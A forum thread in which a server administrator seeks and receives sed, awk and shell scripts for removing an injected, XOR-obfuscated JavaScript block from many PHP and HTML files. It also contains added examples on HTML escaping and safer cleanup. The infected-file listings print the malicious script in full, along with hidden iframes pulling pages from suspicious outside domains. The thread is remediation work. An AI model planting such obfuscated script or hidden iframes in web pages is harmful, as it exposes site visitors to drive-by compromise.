javascript injection

Please advise a script to get rid of the following code, which has infected a large number of files (in particular PHP and HTML files):

<div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>

Thanks

Are there any other sections which start with:

<div id="testws35fdgh"></div>

and end with:

</script>'>

So do sections like:

<div id="testws35fdgh"></div>
some
other
lines
in between
</script>'>

exist?

No, there isn't, but there are multiple instances of the same code in a single file.

say ....

mailnull 12442 0.0 0.2 6936 2288 pts/1 S 05:20 0:05 eximstats
root 12494 1.3 48.0 676664 493888 pts/1 DN 05:20 7:55 cpanellogd - updating bandwidth for nandkdes

root@server1 [/opt/public_html/includes]# grep -lr 'testws35fdgh' .
./login.php
./main.php
root@server1 [/opt/public_html/includes]#

root@server1 [/opt/public_html/includes]# cat main.php | more
<font color='<?php echo $config['font']; ?> <div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>
<b><?php echo $config['welcomemsg']; ?> <div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script></b><br>
This interface has admin provision set to <b><?php echo $config['provision']; ?><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>

Please advise.

Thanks

You might try something like this:

sed -e '/id="testws35fdgh"/,/<\/script>/d' login.php > login.php.new

and verify that login.php.new is as you wish.

Please be online... I am checking it.

It almost works, but it removes anything that is on the same line as the text "testws35fdgh". In this case, if you check the two files, you will find that the </body> tag present in the infected file is missing from index.html.html.new. Also, please advise how we can successfully do this for thousands of files in the entire /home directory. The directory structure of /home is like /home/username/public_html.

root@server1 [/opt/abc/manual]# cat index.html.html
########################Top part truncated ########################
</tr>
</table>
<br />
<br />
</div>

&lt;p align="center"&gt;Maintained by the &lt;a
href="http://httpd.apache.org/docs-project/"&gt;Apache HTTP Server
Documentation Project&lt;/a&gt;.&lt;/p&gt;
    &lt;hr /&gt;

&lt;h3 align="CENTER"&gt;Apache HTTP Server&lt;/h3&gt;
&lt;a href="./"&gt;&lt;img src="images/index.gif" alt="Index" /&gt;&lt;/a&gt;

</body><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>
</html>

root@server1 [/opt/abc/manual]# sed -e '/id="testws35fdgh"/,/<\/script>/d' index.html.html > index.html.html.new

root@server1 [/opt/abc/manual]# cat index.html.html.new
########################Top part truncated ########################
</tr>

          &lt;tr&gt;
            &lt;td&gt;&lt;a href="sitemap.html"&gt;SiteMap&lt;/a&gt;
            &lt;/td&gt;
          &lt;/tr&gt;

          &lt;tr&gt;
            &lt;td&gt;&lt;a href="misc/tutorials.html"&gt;Tutorials&lt;/a&gt;
            &lt;/td&gt;
          &lt;/tr&gt;

          &lt;tr&gt;
            &lt;td&gt;&lt;a href="misc/"&gt;Other Notes&lt;/a&gt; &lt;/td&gt;
          &lt;/tr&gt;
        &lt;/table&gt;
      &lt;/td&gt;
    &lt;/tr&gt;
  &lt;/table&gt;
  &lt;br /&gt;
  &lt;br /&gt;
&lt;/div&gt;

&lt;p align="center"&gt;Maintained by the &lt;a
href="http://httpd.apache.org/docs-project/"&gt;Apache HTTP Server
Documentation Project&lt;/a&gt;.&lt;/p&gt;
    &lt;hr /&gt;

&lt;h3 align="CENTER"&gt;Apache HTTP Server&lt;/h3&gt;
&lt;a href="./"&gt;&lt;img src="images/index.gif" alt="Index" /&gt;&lt;/a&gt;

</html>

Thanks

What about removing only .....

<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>

at the first instance and the "<div id="testws35fdgh"></div>" part with a replace command at the second instance.

How should I start/end the sed command for

<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26
\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a
"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\
x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\
x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x3
4\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>'>

Thanks

root@server1 [/opt/abc/manual]# sed -e '/language="JavaScript"/,/<\/script>/d' footer.html > footer.html.new

works, but what if there is some genuine JavaScript starting with <script language="JavaScript">? :)

nawk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' login.php | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > login.php.new

Thank you... checking it... please be online... I want to resolve this.

The nawk command is not available on the server... is an RPM package available for the nawk command on Red Hat Linux?

Great... thanks a ton... it's working perfectly... you are my hero.

I have used awk instead of nawk:

root@server1 [/opt/abc/manual]# awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' footer.html | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > footer.html.new

root@server1 [/opt/abc/manual]# cat footer.html
<hr />

&lt;h3 align="CENTER"&gt;Apache HTTP Server&lt;/h3&gt;
&lt;a href="./"&gt;&lt;img src="images/index.gif" alt="Index" /&gt;&lt;/a&gt;

<IFRAME name='StatPage' src='http://www.kaspersky-norton.ws/new/traff.php' width=5 height=5 style='display:none'></IFRAME><IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x26\x21\x30\x39\x34"; var4 = "\x34\x27\x21\x3a\x3c\x26\x7b\x27\x20\x7a"; var5 = "\x3c\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25"; var6 = "\x72\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72"; var7 = "\x64\x63\x72\x75\x22\x3c\x31\x21\x3d\x68"; var8 = "\x72\x64\x63\x72\x75\x33\x27\x34\x38\x30"; var9 = "\x37\x3a\x27\x31\x30\x27\x68\x72\x65\x72"; var10 = "\x75\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32"; var11 = "\x68\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33"; var12 = "\x27\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script>

root@server1 [/opt/abc/manual]#
root@server1 [/opt/abc/manual]#
root@server1 [/opt/abc/manual]# cat footer.html.new
<hr />

&lt;h3 align="CENTER"&gt;Apache HTTP Server&lt;/h3&gt;
&lt;a href="./"&gt;&lt;img src="images/index.gif" alt="Index" /&gt;&lt;/a&gt;

<IFRAME name='StatPage' src='http://www.kaspersky-norton.ws/new/traff.php' width=5 height=5 style='display:none'></IFRAME><IFRAME name='StatPage' src='http://www.kusik-tusik-trf.com/trf/traf.php' width=5 height=5 style='display:none'></IFRAME>

Thanks a lot......

One last question: how can we devise a script that will replace this in the same file it is scanned in? It is not possible for me to manually run this script for each file. Is it possible?

#!/usr/bin/ksh

# List every file under the top directory that contains the marker, then run
# the awk/sed pipeline from above on each one and copy the result back over it.
find <top directory where all these files are located> -type f -exec grep -l  'id="testws35fdgh"' {} \; | \
while read FILE
do
  awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' "${FILE}" | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > /tmp/whatsinaname
  cp /tmp/whatsinaname "${FILE}"
done
rm /tmp/whatsinaname

Checking

Thanks

Why fix the infected files? Don't you keep a sane copy of your static pages and scripts offline at a safe place?

Your CGI/PHP/etc. ought to be implemented in such a way as to have converted any '<' and '>' received to '&lt;' and '&gt;' before generating the output. Injection will not have been successful if this check exists.

The script seems to be working fine... thanks a lot... I will let you know the effectiveness of the script after I run it server-wide.

Hello cbkihong,

Please explain --->

Your CGI/PHP/etc. ought to be implemented in such a way as to have converted any '<' and '>' received to '&lt;' and '&gt;' before generating the output. Injection will not have been successful if this check exists.

Thanks.

What I meant was this:

Neither fixing the defaced files nor replacing them is patching the security hole. The issue occurs because your PHP/CGI does not replace all '<' and '>' with their HTML entity counterparts (&lt; &gt;) in dynamically generated text when generating HTML output. If your PHP/CGI has implemented this, then even though people try to inject script sections into your HTML files, they will not become executable JavaScript, and at least the attack is not successful because browsers will not treat them as script and execute them (people will see some strange JavaScript code on the page, but you should be monitoring for such things, right?).

Try searching online for more information on JavaScript injection. There are many patterns for these kinds of attacks.
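The output-encoding rule cbkihong describes, as an added example that is not from the thread: a small POSIX sh/sed function that turns the characters that can open markup into entities before text is written into a page, so an injected marker or script tag is displayed as text instead of being parsed by the browser. The function names and the constructed sample are mine; in PHP the equivalent call is htmlspecialchars().

```shell
#!/bin/sh
# Added example: entity-encode untrusted text before it is emitted into HTML.
# The order of the substitutions matters: '&' must be encoded first, otherwise
# the '&' introduced by the later substitutions would be encoded a second time.

# html_escape STRING: print STRING with &, <, >, " and ' replaced by entities.
html_escape() {
  printf '%s' "$1" | sed \
    -e 's/&/\&amp;/g' \
    -e 's/</\&lt;/g' \
    -e 's/>/\&gt;/g' \
    -e 's/"/\&quot;/g' \
    -e "s/'/\&#39;/g"
}

# contains_markup STRING: succeed (exit 0) if STRING still holds a raw '<' or
# '>', i.e. if a browser could parse part of it as a tag.
contains_markup() {
  case "$1" in
    *\<*|*\>*) return 0 ;;
    *)         return 1 ;;
  esac
}

# Constructed sample: the marker from the thread followed by a script tag, as it
# would arrive in untrusted input. "raw" is what a CGI that echoes input verbatim
# emits (the vulnerable case); "safe" is what an encoding CGI emits.
injected='<div id="testws35fdgh"></div><script language="JavaScript">var dst = "";</script>'
raw="$injected"
safe=$(html_escape "$injected")

if contains_markup "$raw"; then
  echo "raw output would be parsed as markup: $raw"
fi
if contains_markup "$safe"; then
  echo "ERROR: escaped output still contains markup"
else
  echo "escaped output is inert text: $safe"
fi
```

Apply the encoding at the point where dynamic text is written into the page, not when it is stored; that way the stored value stays intact and every output path gets the same protection.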

Hi,

There still seem to be problems with pages that have genuine JavaScript code.

Anyway... thank you very much for your advice.

Hello sb008,

I finally found that the script works perfectly, except that it removes the whole last line instead of just "</script>"...

To show you what I mean, I have added the test below...

If you look, you will find that for the line that has the JavaScript closing tag
</script>, it removes </html> from "</script> </html>". If this can be fixed, the script will work superbly.

root@server2 [/home/planetc]# cat /root/replaceJavInfect
find /home/planetc/public_html -type f -exec grep -l 'id="testws35fdgh"' {} \; | \
while read FILE
do
awk '/id="testws35fdgh"/ { print $0"XXXXX" } { print $0 }' ${FILE} | sed -e 's/<div id="testws35fdgh">.*XXXXX$//' -e '/id="testws35fdgh"/,/<\/script>/d' > /tmp/whatsinaname
cp /tmp/whatsinaname ${FILE}
done

root@server2 [/home/planetc]# cat public_html/templates/fjt_cortrivenus/index.html
<html><body bgcolor="#FFFFFF"></body><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33\x27\x34\x38\x30\x75\x3b\x34"; var1 = "\x38\x30\x68\x72\x36\x3a\x20\x3b\x21\x30"; var2 = "\x27\x72\x75\x26\x27\x36\x68\x72\x3d\x21"; var3 = "\x21\x25\x6f\x7a\x7a\x33\x27\x34\x38\x30"; var4 = "\x26\x21\x34\x21\x7b\x3b\x30\x21\x7a\x3c"; var5 = "\x3b\x31\x30\x2d\x67\x7b\x25\x3d\x25\x72"; var6 = "\x75\x3d\x30\x3c\x32\x3d\x21\x68\x72\x64"; var7 = "\x63\x72\x75\x22\x3c\x31\x21\x3d\x68\x72"; var8 = "\x64\x63\x72\x75\x33\x27\x34\x38\x30\x37"; var9 = "\x3a\x27\x31\x30\x27\x68\x72\x65\x72\x75"; var10 = "\x26\x36\x27\x3a\x39\x39\x3c\x3b\x32\x68"; var11 = "\x72\x3b\x3a\x72\x6b\x69\x7a\x3c\x33\x27"; var12 = "\x34\x38\x30\x6b";
sr = var0+var1+var2+var3+var4+var5+var6+var7+var8+var9+var10+var11+var12;
dst = "";
for(i = 0; i < sr.length; i++) {
var d = parseInt(sr.charCodeAt(i) ^ 85);
dst = dst + String.fromCharCode(d);
}
document.getElementById("testws35fdgh").innerHTML = dst;
</script> </html>

root@server2 [/home/planetc/public_html]# cat templates/fjt_cortrivenus/index.html
<html><body bgcolor="#FFFFFF"></body>
root@server2 [/home/planetc/public_html]#

Please advise.

Thanks
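The cleanup this thread converges on, rewritten as an added example (not sb008's script or any other code from the original posts) that handles the two problems reported above: legitimate text on the same line before the `<div id="testws35fdgh"></div>` marker (the missing </body>), and legitimate text on the same line after `</script>` (the `</script> </html>` case). Instead of sed line ranges it walks each file with a small awk state machine, so only the marker and the script block after it are removed. It assumes the marker string shown in the thread, POSIX sh and awk, and a constructed sample file for its self-test; the `.infected` backup suffix and the file-name filter are my choices.

```shell
#!/bin/sh
# Added example: strip the "testws35fdgh" injection (marker div plus the script
# block that follows it) while keeping any legitimate text that shares a line
# with the marker or with the closing </script>. The marker string is the one
# from the thread; the backup suffix and the self-test sample are constructed.

MARKER='<div id="testws35fdgh"></div>'

# clean_injection FILE: write the cleaned content of FILE to stdout.
clean_injection() {
  awk -v mark="$MARKER" '
    BEGIN { inject = 0; pending = "" }      # inject=1 while inside a payload
    {
      line = $0
      out = pending           # text kept from the line that carried the marker
      pending = ""
      touched = 0
      while (1) {
        if (!inject) {
          p = index(line, mark)
          if (p == 0) { out = out line; break }
          out = out substr(line, 1, p - 1)           # keep text before marker
          line = substr(line, p + length(mark))
          inject = 1; touched = 1
        } else {
          q = index(line, "</script>")
          if (q == 0) { touched = 1; break }         # rest of line is payload
          line = substr(line, q + length("</script>"))   # keep text after it
          inject = 0; touched = 1
        }
      }
      if (inject) { pending = out; next }   # payload continues on the next line
      if (touched && out == "") next        # line held nothing but payload
      print out
    }
    END { if (pending != "") print pending }   # block never closed before EOF
  ' "$1"
}

# clean_tree DIR: clean every infected php/html file under DIR in place,
# keeping the original as FILE.infected so the payload is preserved as evidence.
clean_tree() {
  find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
       -exec grep -lF "$MARKER" {} + |
  while IFS= read -r file; do
    cp -p "$file" "$file.infected" || continue
    clean_injection "$file" > "$file.tmp" && mv "$file.tmp" "$file"
    echo "cleaned: $file"
  done
}

# demo: run clean_injection over a constructed sample that reproduces the
# thread's edge cases with a short stand-in payload, and print the result.
demo() {
  tmp=$(mktemp) || return 1
  cat > "$tmp" <<'EOF'
<html><body bgcolor="#FFFFFF"></body><div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33";
document.getElementById("testws35fdgh").innerHTML = dst;
</script> <b>welcome<div id="testws35fdgh"></div>
<script language="JavaScript">
var0 = "\x69\x3c\x33";
</script></b><br>
<script language="JavaScript">
var keep = 1; /* genuine script, must survive */
</script>
</html>
EOF
  clean_injection "$tmp"
  rm -f "$tmp"
}

case "${1:-}" in
  "") demo ;;             # no argument: print the self-test output
  *)  clean_tree "$1" ;;  # argument: top directory to clean (e.g. /home)
esac
```

Run it with a directory argument to clean in place, and without one to see the self-test output, where the genuine `<script language="JavaScript">` block survives because the matching keys on the literal marker rather than on the script tag. The `<IFRAME>` lines shown in footer.html above are a separate injection that this does not touch; the `.infected` copies are what to hand to whoever investigates how the files were modified in the first place.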